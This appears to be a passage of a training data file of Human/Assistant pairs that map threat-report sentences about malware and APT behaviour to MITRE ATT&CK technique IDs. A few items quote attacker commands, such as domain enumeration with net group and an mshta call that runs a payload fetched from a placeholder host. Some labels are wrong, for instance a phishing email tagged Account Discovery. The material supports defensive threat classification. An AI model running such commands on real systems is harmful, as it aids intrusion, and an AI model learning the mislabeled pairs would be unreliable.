ATT&CK framework.,Stealth Falcon malware gathers a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba logs keystrokes via polling by using GetKeyState and VkKeyScan functions.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper used netview to scan target systems for shared resources.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have been observed leveraging third-party drivers like RawDisk to directly access disk content.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has collected the IP address and network adapter information from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT can download and upload files to and from the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon checks for anti-malware products and processes.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To support complex operations, the XSL standard includes support for embedded scripting in various languages.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has masqueraded as Windows system file names, as well as ""chkntfs.exe"" and ""syscron.exe"".### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has also used net group ""Domain Computers"" /domain, net group ""Domain Controllers"" /domain, and net group ""Exchange Servers"" /domain to enumerate domain computers, including the organization's DC and Exchange Server.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux Rabbit attempts to gain access to the server via SSH.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus achieved persistence by placing a malicious executable in the startup directory.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Even if the arsenal of this actor is diverse, we have identified some patterns, copy-paste code from various public repositories and similarities between the different piece of code### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can gather information on the victim IP address.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can monitor for removable drives being plugged into the compromised machine.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy Dragonfly 2.0 dropped and executed SecretsDump to dump password hashes.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon uses HTTP for communication to the control servers.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may clear the history environment variable or set the command history size to zero to prevent logging of commands.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL C2 messages are Base64-encoded.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a Perl script for information gathering.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has packed malware with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has decrypted strings and imports using RC4 during execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to use -WindowStyle Hidden to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.### Assistant: T1528: Steal Application Access Token" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the flaw being exploited this may include Exploitation for Defense Evasion.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy can steal clipboard contents.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can sleep for a given number of seconds.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has used forged Microsoft code-signing certificates on malware.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI can gather information on drives and the operating system on the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon has decrypted encrypted strings.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Volgmer variant is encoded using a simple XOR cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SPACESHIP copies staged data to removable drives when they are inserted into the system.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet can brute force a local admin password, then use it to facilitate lateral movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to hide the window for operations performed on a given file.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp can download and execute new plugins from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Message 2: Headers Received: by mailcenter.support Sender Council on Foreign Relations Subject The Four Traps China May Fall Into Body Content and images included within the e-mail body were a direct copy of the following CFR article: https://www.cfr.org/blog/four-traps-china-may-fall Notes Multiple hyperlinks within the e-mail body lead to a malicious RTF document located at the URL hxxp://fprii.net/The_Four_Traps_for_China.doc### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer collects the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files may be executed by mshta.exe through an inline script: mshta vbscript:Close"" They may also be executed directly from URLs: mshta http://webserver/payload.hta Mshta.exe can be used to bypass application control solutions that do not account for its potential use.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has captured credentials via fake Outlook Web App login pages and has also used a .NET based keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has collected the current date and time of the victim system.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use side-loading to run malicious executables.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has obfuscated its strings with a simple XOR encryption with a static key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the string is present, the malware executes the command RunDll32.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This Registry key is not created by default during an Office installation.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use binary padding to add junk data and change the on-disk representation of malware.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has used RC4 encryption to download modules.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Later versions have hard-coded keys uniquely for each C2 address.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may buy and/or steal code signing certificates that can be used during targeting.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used appcmd.exe to disable logging on a victim server.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The de facto standard across cloud service providers is to host the Instance Metadata API at http://169.254.169.254.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM has the ability to use WMI to delete volume shadow copies.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Discovery Inspector protects customers from these threats via this DDI Rule: DDI Rule 18 : DNS response of a queried malware Command and Control domain DDI Rule 15 : Many unsuccessful logon attempts (nbt_scan.exe) DDI Rule 38 : Multiple unsuccessful logon attempts (nbt_scan.exe) TippingPoint customers are protected from these threats via these ThreatDV filters: 27218: HTTP: TROJ_RATANKBA_A Checkin 28219: HTTP: TROJ_RATANKBA_A Checkin 02 27220: HTTPS: TROJ_RATANKBA_A Checkin 27221: HTTP: Sundown EK Flash Exploit (SWF_EXPLOYT.YYRQ) A list of related Indicators of Compromise (IoCs) can be found in this appendix### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also directly start services through Service Execution.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher has used CreateProcessW API for execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Destover-like variant used by Lazarus Group also gathers process times.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can gather a list of running processes by using Tasklist.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to c8:27:cc:c2:37:5a.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerberos authentication can be used as the first step to lateral movement to a remote system.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke can enumerate the CPUID and BIOS version on a compromised system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this case, the malicious emails contain links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CozyCar has executed Mimikatz to harvest stored credentials from the victim and further victim penetration.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses the net group command.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can gather a list of processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to find group and permission settings.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage can execute arbitrary commands with the command line.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cluster A Case 1: Delivery via document property macro – a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483  In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This approach may be used to avoid triggering network data transfer threshold alerts.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Sakula samples install themselves as services for persistence by calling WinExec with the net start argument.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has decoded Base64 encoded URLs to insert a recipient’s name into the filename of the Word document.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used PsExec to deploy beacons on compromised systems.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other accessibility features exist that may also be leveraged in a similar fashion: * On-Screen Keyboard: C:\Windows\System32\osk.exe * Magnifier: C:\Windows\System32\Magnify.exe * Narrator: C:\Windows\System32\Narrator.exe * Display Switcher: C:\Windows\System32\DisplaySwitch.exe * App Switcher: C:\Windows\System32\AtBroker.exe Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used InstallUtil.exe to execute malicious software.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APC injection is commonly performed by attaching malicious code to the APC Queue of a process's thread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ARP protocol is stateless and does not require authentication.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has encrypted TCP communications to evade detection.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to use a DGA for C2 communications.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The binary will then be executed by the system when the authentication packages are loaded.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Felismus uses command line for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ELMER is capable of performing process listings.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has encrypted C2 commands with AES-256.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cracking hashes is usually done on adversary-controlled systems outside of the target network.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can be configured to use HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has used protocol tunneling to further conceal C2 communications and infrastructure.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT28 loader Trojan uses a cmd.exe and batch script to run its payload.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin has a command named $screenshot that may be responsible for taking screenshots of the victim machine.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BOOSTWRITE has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uses HTTP and HTTPS to communicate with the C2 server.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS .### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM leveraged valid accounts to maintain access to a victim network.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has dumped credentials from victims in several ways, including by using open source tools Mimikatz and Lazagne, or by harvesting credentials when users log into Outlook Web Access.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib has the ability to obtain screenshots of the compromised system.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may send phishing messages to gain access to victim systems.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Benign commands or other operations may also be used to delay malware execution.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke steals user files from local hard drives with file extensions that match a predefined list.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 routinely removed their tools, including custom backdoors, once remote access was achieved.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL can download and execute additional payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack’s can download and upload a file to the victim’s computer.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer also leveraged system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can execute getinfo to identify the username on a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of Modify System Image, forcing the use of software to perform encryption on general processors.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,to plist filenames, unlisting them from the Finder app and default Terminal directory listings.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It does so using either the HTTPS/HTTP or DNS channels, depending on which method is successful### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Malicious ads are paid for and served through legitimate ad providers.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”) -ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to steal saved passwords from Microsoft Outlook.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum was seen using a keylogger tool to capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dubbed ‘SpeakUp’, the new Trojan exploits known vulnerabilities in six different Linux distributions### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has deleted the MSI file after installation.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 Hardcoded Google Drive URL used in RogueRobin sample When the modification_time for the first file changes, the Trojan downloads the contents from the first file uploaded to the Google Drive### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SharpStage has checked the system settings to see if Arabic is the configured language.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The discovery modules used with Duqu can collect information on open windows.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UPPERCUT has the capability to gather the victim's proxy information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner launched the QEMU services in the /Library/LaunchDaemons/ folder using launchctl.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can use a custom algorithm to decrypt strings used by the malware.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Registry of a remote system may be modified to aid in execution of files as part of lateral movement.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has obtained valid accounts to gain initial access.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan uses a backdoor known as BADFLICK that is is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML..### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attackers can abuse this by looking through the file for potential credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may deface systems external to an organization in an 